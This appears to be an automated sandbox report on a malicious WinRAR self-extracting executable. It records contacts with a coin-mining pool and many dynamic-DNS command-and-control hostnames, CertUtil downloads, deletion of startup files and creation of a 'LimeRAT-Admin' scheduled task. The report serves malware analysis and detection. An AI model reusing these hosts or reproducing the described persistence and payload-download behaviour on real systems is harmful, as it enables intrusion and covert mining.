Summary | ZeroBOX

IE.exe

Gen1 Cryptocurrency Miner Generic Malware Malicious Library task schedule Antivirus Cryptocurrency CoinHive UPX Malicious Packer WinRAR Code injection Anti_VM HTTP ScreenShot Create Service DGA DNS Internet API Sniff Audio Socket
Category Machine Started Completed
FILE s1_win7_x6401 May 2, 2022, 8:56 a.m. May 2, 2022, 8:58 a.m.
Size 427.7KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 d55af7419949eb1630bf0e6b3684166e
SHA256 bff7a405dc189f102b598e9fbbc88ce74f6ef1bd9dac4fa7fc93e8841233ca32
CRC32 8AEB3958
ssdeep 6144:8/fAhvV6B8ErzPZp5wdz753RSkKJUH43YvN6sNmw3zi7qZ1l+/Axoq8L:YfAv6B8azBwdtK2H4IvN6YQq1l+YxEL
PDB Path D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Yara
  • IsPE32 - (no description)
  • OS_Processor_Check_Zero - OS Processor Check
  • UPX_Zero - UPX packed file
  • Win32_WinRAR_SFX_Zero - Win32 WinRAR SFX
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature

Name Response Post-Analysis Lookup
muslada2251.viewdns.net
marena9201.ddns.net
niogem1171.bounceme.net 0.0.0.0
muslada2251.myvnc.com
pastebin.com 104.20.68.143
muslada2251.hopto.org
muslada2251.serveminecraft.net
niogem1171.serveftp.com
niogem1171.servecounterstrike.com
niogem1171.hopto.org 0.0.0.0
muslada2251.serveftp.com
muslada2251.servecounterstrike.com
muslada2251.3utilities.com 3.1.85.243
niogem1171.ddns.net
niogem1171.servequake.com
niogem1171.sytes.net
muslada2251.servehalflife.com
muslada2251.gotdns.ch
muslada2251.servequake.com
marena9201.bounceme.net
marena9201.3utilities.com
niogem1171.freedynamicdns.net 0.0.0.0
marena9201.freedynamicdns.net
rinot972.ddnsking.com 41.103.107.68
niogem1171.serveminecraft.net
muslada2251.servebeer.com
niogem1171.onthewifi.com
niogem1171.viewdns.net
rinot972.ddns.net
muslada2251.serveirc.com
muslada2251.servemp3.com
marena9201.freedynamicdns.org
niogem1171.zapto.org 0.0.0.0
muslada2251.bounceme.net
muslada2251.servehttp.com
niogem1171.servehalflife.com
niogem1171.myftp.org 0.0.0.0
niogem1171.servegame.com
muslada2251.servepics.com
muslada2251.myftp.org
niogem1171.serveblog.net 0.0.0.0
niogem1171.freedynamicdns.org 3.1.85.243
muslada2251.ddnsking.com 0.0.0.0
niogem1171.webhop.me 0.0.0.0
niogem1171.gotdns.ch 0.0.0.0
niogem1171.ddnsking.com 0.0.0.0
muslada2251.redirectme.net
muslada2251.webhop.me
marena9201.gotdns.ch
niogem1171.3utilities.com 0.0.0.0
muslada2251.myftp.biz
niogem1171.servebeer.com
niogem1171.myftp.biz 0.0.0.0
niogem1171.servemp3.com
muslada2251.ddns.net
niogem1171.myvnc.com 0.0.0.0
marena9201.ddnsking.com
muslada2251.zapto.org
niogem1171.servehttp.com
muslada2251.freedynamicdns.org
muslada2251.sytes.net
muslada2251.freedynamicdns.net
niogem1171.servepics.com
pool.hashvault.pro 131.153.76.130
muslada2251.servegame.com
niogem1171.serveirc.com
niogem1171.redirectme.net
muslada2251.serveblog.net
muslada2251.onthewifi.com
IP Address Status Action
104.20.67.143 Active Moloch
131.153.76.130 Active Moloch
164.124.101.2 Active Moloch
3.1.85.243 Active Moloch
41.103.107.68 Active Moloch
54.254.238.33 Active Moloch

Suricata Alerts

Flow SID Signature Category
TCP 192.168.56.101:49167 -> 104.20.67.143:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49174 -> 104.20.67.143:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49175 -> 104.20.67.143:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49168 -> 104.20.67.143:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49170 -> 104.20.67.143:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 192.168.56.101:49172 -> 104.20.67.143:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
TCP 54.254.238.33:80 -> 192.168.56.101:49217 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 54.254.238.33:80 -> 192.168.56.101:49217 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
TCP 54.254.238.33:80 -> 192.168.56.101:49223 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 54.254.238.33:80 -> 192.168.56.101:49223 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
UDP 192.168.56.101:62062 -> 164.124.101.2:53 2028675 ET POLICY DNS Query to DynDNS Domain *.ddns .net Potentially Bad Traffic
TCP 54.254.238.33:80 -> 192.168.56.101:49221 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 54.254.238.33:80 -> 192.168.56.101:49221 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
UDP 192.168.56.101:53258 -> 164.124.101.2:53 2028677 ET POLICY DNS Query to DynDNS Domain *.3utilities .com Potentially Bad Traffic
UDP 192.168.56.101:61798 -> 164.124.101.2:53 2028677 ET POLICY DNS Query to DynDNS Domain *.3utilities .com Potentially Bad Traffic
TCP 192.168.56.101:49224 -> 104.20.67.143:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:60131 -> 164.124.101.2:53 2028675 ET POLICY DNS Query to DynDNS Domain *.ddns .net Potentially Bad Traffic
UDP 192.168.56.101:57609 -> 164.124.101.2:53 2028676 ET POLICY DNS Query to DynDNS Domain *.ddnsking .com Potentially Bad Traffic
UDP 192.168.56.101:61681 -> 164.124.101.2:53 2028676 ET POLICY DNS Query to DynDNS Domain *.ddnsking .com Potentially Bad Traffic
UDP 192.168.56.101:59417 -> 164.124.101.2:53 2028678 ET POLICY DNS Query to DynDNS Domain *.bounceme .net Potentially Bad Traffic
UDP 192.168.56.101:49349 -> 164.124.101.2:53 2028680 ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .org Potentially Bad Traffic
TCP 192.168.56.101:49239 -> 104.20.67.143:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:54813 -> 164.124.101.2:53 2028680 ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .org Potentially Bad Traffic
UDP 192.168.56.101:63998 -> 164.124.101.2:53 2028684 ET POLICY DNS Query to DynDNS Domain *.myftp .org Potentially Bad Traffic
UDP 192.168.56.101:57509 -> 164.124.101.2:53 2028686 ET POLICY DNS Query to DynDNS Domain *.onthewifi .com Potentially Bad Traffic
UDP 192.168.56.101:63692 -> 164.124.101.2:53 2028692 ET POLICY DNS Query to DynDNS Domain *.servegame .com Potentially Bad Traffic
UDP 192.168.56.101:53804 -> 164.124.101.2:53 2028701 ET POLICY DNS Query to DynDNS Domain *.viewdns .net Potentially Bad Traffic
UDP 192.168.56.101:63083 -> 164.124.101.2:53 2028675 ET POLICY DNS Query to DynDNS Domain *.ddns .net Potentially Bad Traffic
UDP 192.168.56.101:56225 -> 164.124.101.2:53 2028677 ET POLICY DNS Query to DynDNS Domain *.3utilities .com Potentially Bad Traffic
TCP 192.168.56.101:49244 -> 104.20.67.143:443 906200054 SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) undefined
UDP 192.168.56.101:61444 -> 164.124.101.2:53 2028691 ET POLICY DNS Query to DynDNS Domain *.serveftp .com Potentially Bad Traffic
UDP 192.168.56.101:61055 -> 164.124.101.2:53 2028694 ET POLICY DNS Query to DynDNS Domain *.servehttp .com Potentially Bad Traffic
UDP 192.168.56.101:49911 -> 164.124.101.2:53 2028693 ET POLICY DNS Query to DynDNS Domain *.servehalflife .com Potentially Bad Traffic
UDP 192.168.56.101:62380 -> 164.124.101.2:53 2028696 ET POLICY DNS Query to DynDNS Domain *.serveminecraft .net Potentially Bad Traffic
UDP 192.168.56.101:55247 -> 164.124.101.2:53 2028703 ET POLICY DNS Query to DynDNS Domain *.zapto .org Potentially Bad Traffic
UDP 192.168.56.101:54130 -> 164.124.101.2:53 2028678 ET POLICY DNS Query to DynDNS Domain *.bounceme .net Potentially Bad Traffic
UDP 192.168.56.101:62594 -> 164.124.101.2:53 2028679 ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .net Potentially Bad Traffic
UDP 192.168.56.101:51074 -> 164.124.101.2:53 2028686 ET POLICY DNS Query to DynDNS Domain *.onthewifi .com Potentially Bad Traffic
UDP 192.168.56.101:51507 -> 164.124.101.2:53 2028687 ET POLICY DNS Query to DynDNS Domain *.redirectme .net Potentially Bad Traffic
UDP 192.168.56.101:59985 -> 164.124.101.2:53 2028689 ET POLICY DNS Query to DynDNS Domain *.serveblog .net Potentially Bad Traffic
UDP 192.168.56.101:60905 -> 164.124.101.2:53 2028690 ET POLICY DNS Query to DynDNS Domain *.servecounterstrike .com Potentially Bad Traffic
UDP 192.168.56.101:63012 -> 164.124.101.2:53 2028694 ET POLICY DNS Query to DynDNS Domain *.servehttp .com Potentially Bad Traffic
UDP 192.168.56.101:58490 -> 164.124.101.2:53 2028697 ET POLICY DNS Query to DynDNS Domain *.servemp3 .com Potentially Bad Traffic
UDP 192.168.56.101:61124 -> 164.124.101.2:53 2028698 ET POLICY DNS Query to DynDNS Domain *.servepics .com Potentially Bad Traffic
UDP 192.168.56.101:50130 -> 164.124.101.2:53 2028703 ET POLICY DNS Query to DynDNS Domain *.zapto .org Potentially Bad Traffic
UDP 192.168.56.101:62255 -> 164.124.101.2:53 2028678 ET POLICY DNS Query to DynDNS Domain *.bounceme .net Potentially Bad Traffic
UDP 192.168.56.101:53608 -> 164.124.101.2:53 2028681 ET POLICY DNS Query to DynDNS Domain *.hopto .org Potentially Bad Traffic
UDP 192.168.56.101:56401 -> 164.124.101.2:53 2013823 ET INFO DYNAMIC_DNS Query to a Suspicious *.myftp.biz Domain Potentially Bad Traffic
UDP 192.168.56.101:56401 -> 164.124.101.2:53 2027863 ET INFO Observed DNS Query to .biz TLD Potentially Bad Traffic
UDP 192.168.56.101:50849 -> 164.124.101.2:53 2013823 ET INFO DYNAMIC_DNS Query to a Suspicious *.myftp.biz Domain Potentially Bad Traffic
UDP 192.168.56.101:50849 -> 164.124.101.2:53 2027863 ET INFO Observed DNS Query to .biz TLD Potentially Bad Traffic
UDP 192.168.56.101:58290 -> 164.124.101.2:53 2028691 ET POLICY DNS Query to DynDNS Domain *.serveftp .com Potentially Bad Traffic
UDP 192.168.56.101:56988 -> 164.124.101.2:53 2028693 ET POLICY DNS Query to DynDNS Domain *.servehalflife .com Potentially Bad Traffic
UDP 192.168.56.101:58861 -> 164.124.101.2:53 2028695 ET POLICY DNS Query to DynDNS Domain *.serveirc .com Potentially Bad Traffic
UDP 192.168.56.101:52610 -> 164.124.101.2:53 2028696 ET POLICY DNS Query to DynDNS Domain *.serveminecraft .net Potentially Bad Traffic
UDP 192.168.56.101:50858 -> 164.124.101.2:53 2028697 ET POLICY DNS Query to DynDNS Domain *.servemp3 .com Potentially Bad Traffic
UDP 192.168.56.101:57479 -> 164.124.101.2:53 2028676 ET POLICY DNS Query to DynDNS Domain *.ddnsking .com Potentially Bad Traffic
UDP 192.168.56.101:58402 -> 164.124.101.2:53 2028679 ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .net Potentially Bad Traffic
TCP 54.254.238.33:80 -> 192.168.56.101:49229 2018959 ET POLICY PE EXE or DLL Windows file download HTTP Potential Corporate Privacy Violation
TCP 54.254.238.33:80 -> 192.168.56.101:49229 2021076 ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response Potentially Bad Traffic
UDP 192.168.56.101:62986 -> 164.124.101.2:53 2028684 ET POLICY DNS Query to DynDNS Domain *.myftp .org Potentially Bad Traffic
UDP 192.168.56.101:51547 -> 164.124.101.2:53 2028685 ET POLICY DNS Query to DynDNS Domain *.myvnc .com Potentially Bad Traffic
UDP 192.168.56.101:60516 -> 164.124.101.2:53 2028685 ET POLICY DNS Query to DynDNS Domain *.myvnc .com Potentially Bad Traffic
UDP 192.168.56.101:56371 -> 164.124.101.2:53 2028687 ET POLICY DNS Query to DynDNS Domain *.redirectme .net Potentially Bad Traffic
UDP 192.168.56.101:49954 -> 164.124.101.2:53 2028688 ET POLICY DNS Query to DynDNS Domain *.servebeer .com Potentially Bad Traffic
UDP 192.168.56.101:57333 -> 164.124.101.2:53 2028688 ET POLICY DNS Query to DynDNS Domain *.servebeer .com Potentially Bad Traffic
UDP 192.168.56.101:52905 -> 164.124.101.2:53 2028689 ET POLICY DNS Query to DynDNS Domain *.serveblog .net Potentially Bad Traffic
UDP 192.168.56.101:57596 -> 164.124.101.2:53 2028690 ET POLICY DNS Query to DynDNS Domain *.servecounterstrike .com Potentially Bad Traffic
UDP 192.168.56.101:57451 -> 164.124.101.2:53 2028699 ET POLICY DNS Query to DynDNS Domain *.servequake .com Potentially Bad Traffic
UDP 192.168.56.101:58519 -> 164.124.101.2:53 2028698 ET POLICY DNS Query to DynDNS Domain *.servepics .com Potentially Bad Traffic
UDP 192.168.56.101:51869 -> 164.124.101.2:53 2028702 ET POLICY DNS Query to DynDNS Domain *.webhop .me Potentially Bad Traffic
UDP 192.168.56.101:54098 -> 164.124.101.2:53 2036289 ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) Crypto Currency Mining Activity Detected
UDP 192.168.56.101:56990 -> 164.124.101.2:53 2028681 ET POLICY DNS Query to DynDNS Domain *.hopto .org Potentially Bad Traffic
UDP 192.168.56.101:59610 -> 164.124.101.2:53 2028692 ET POLICY DNS Query to DynDNS Domain *.servegame .com Potentially Bad Traffic
UDP 192.168.56.101:57456 -> 164.124.101.2:53 2028695 ET POLICY DNS Query to DynDNS Domain *.serveirc .com Potentially Bad Traffic
UDP 192.168.56.101:65266 -> 164.124.101.2:53 2028699 ET POLICY DNS Query to DynDNS Domain *.servequake .com Potentially Bad Traffic
UDP 192.168.56.101:52806 -> 164.124.101.2:53 2028701 ET POLICY DNS Query to DynDNS Domain *.viewdns .net Potentially Bad Traffic
UDP 192.168.56.101:51610 -> 164.124.101.2:53 2028702 ET POLICY DNS Query to DynDNS Domain *.webhop .me Potentially Bad Traffic
UDP 192.168.56.101:55835 -> 164.124.101.2:53 2028675 ET POLICY DNS Query to DynDNS Domain *.ddns .net Potentially Bad Traffic
UDP 192.168.56.101:63120 -> 164.124.101.2:53 2028676 ET POLICY DNS Query to DynDNS Domain *.ddnsking .com Potentially Bad Traffic
UDP 192.168.56.101:58791 -> 164.124.101.2:53 2028679 ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .net Potentially Bad Traffic
UDP 192.168.56.101:63457 -> 164.124.101.2:53 2028680 ET POLICY DNS Query to DynDNS Domain *.freedynamicdns .org Potentially Bad Traffic

Suricata TLS

Flow Issuer Subject Fingerprint
TLSv1
192.168.56.101:49167
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1
192.168.56.101:49174
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1
192.168.56.101:49175
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1
192.168.56.101:49168
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1
192.168.56.101:49170
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1
192.168.56.101:49172
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1
192.168.56.101:49224
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1
192.168.56.101:49239
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLSv1
192.168.56.101:49244
104.20.67.143:443
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2 C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com bd:df:4f:1e:29:53:16:4a:b9:cc:a1:42:93:1c:0b:c0:f8:4c:a4:cd
TLS 1.3
192.168.56.101:49274
131.153.76.130:80
None None None

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: echo
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: off
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: The system cannot find the file specified.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: The system cannot find the file specified.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: Deleted file - C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\agent.pyw - 바로 가기.lnk
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: Deleted file - C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: Deleted file - C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helps.vbs
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: Deleted file - C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vm_setting.reg
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: Deleted file - C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\z.vbs
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\updateW\Microsoft.com
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW\winlogins.exe
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: Access is denied.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: The system cannot find the file specified.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: The system cannot find the file specified.
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\updateW\win.com
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: Deleted file - C:\Users\test22\AppData\Local\Temp\IE.exe
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: **** Online ****
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: 003f
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: CertUtil: -URLCache command completed successfully.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: **** Online ****
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: CertUtil: -URLCache command completed successfully.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: **** Online ****
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: CertUtil: -URLCache command completed successfully.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: The operation completed successfully.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW\winupdate.exe
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: 1 File(s) copied
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: Path not found - C:\Users\test22\AppData
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: \Roaming\AppData\Windows Protector
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: File not found - C:\Users\test22\AppData
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: \Roaming\AppData\Windows Protector
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\updateW\Microsoft.com
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: 1 File(s) copied
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: Path not found - C:\Windows (x86)
console_handle: 0x0000000000000013
1 1 0

WriteConsoleW

buffer: **** Online ****
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: 0faead
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: CertUtil: -URLCache command completed successfully.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: SUCCESS: The scheduled task "LimeRAT-Admin" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: **** Online ****
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: 2fe15d
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: CertUtil: -URLCache command completed successfully.
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: C:\Windows (x86)>
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: echo
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: off
console_handle: 0x0000000000000007
1 1 0

WriteConsoleW

buffer: Could Not Find C:\Windows (x86)\config.json
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows (x86)\1xs.txt
console_handle: 0x000000000000000b
1 1 0

WriteConsoleW

buffer: C:\Windows (x86)\2xs.txt
console_handle: 0x000000000000000b
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d2318
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d2118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x002d2118
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654c70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00654770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
pdb_path D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section .gfids
resource name PNG
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
RaiseException+0x3d FreeEnvironmentStringsW-0x373 kernelbase+0xa49d @ 0x7fefda7a49d
RpcRaiseException+0x53 RpcExceptionFilter-0x2bd rpcrt4+0x173c3 @ 0x7fefde573c3
ObjectStublessClient32+0x8bf CoDisconnectContext-0x107b9 ole32+0x443bf @ 0x7feff1d43bf
IUnknown_AddRef_Proxy+0x1f5 NdrFixedArrayBufferSize-0xeb rpcrt4+0x35295 @ 0x7fefde75295
I_RpcFreeBuffer+0x1b9 NdrRangeUnmarshall-0x5a7 rpcrt4+0x32799 @ 0x7fefde72799
Ndr64AsyncServerCallAll+0xa9e Ndr64AsyncClientCall-0xf42 rpcrt4+0xdaf1e @ 0x7fefdf1af1e
Ndr64AsyncServerCallAll+0x12ec Ndr64AsyncClientCall-0x6f4 rpcrt4+0xdb76c @ 0x7fefdf1b76c
NdrStubCall3+0xc6 NdrOleAllocate-0x3ea rpcrt4+0x348d6 @ 0x7fefde748d6
CoGetInstanceFromFile+0x4cd3 HACCEL_UserFree-0x70fd ole32+0x170883 @ 0x7feff300883
CoGetInstanceFromFile+0x511d HACCEL_UserFree-0x6cb3 ole32+0x170ccd @ 0x7feff300ccd
CoGetInstanceFromFile+0x5093 HACCEL_UserFree-0x6d3d ole32+0x170c43 @ 0x7feff300c43
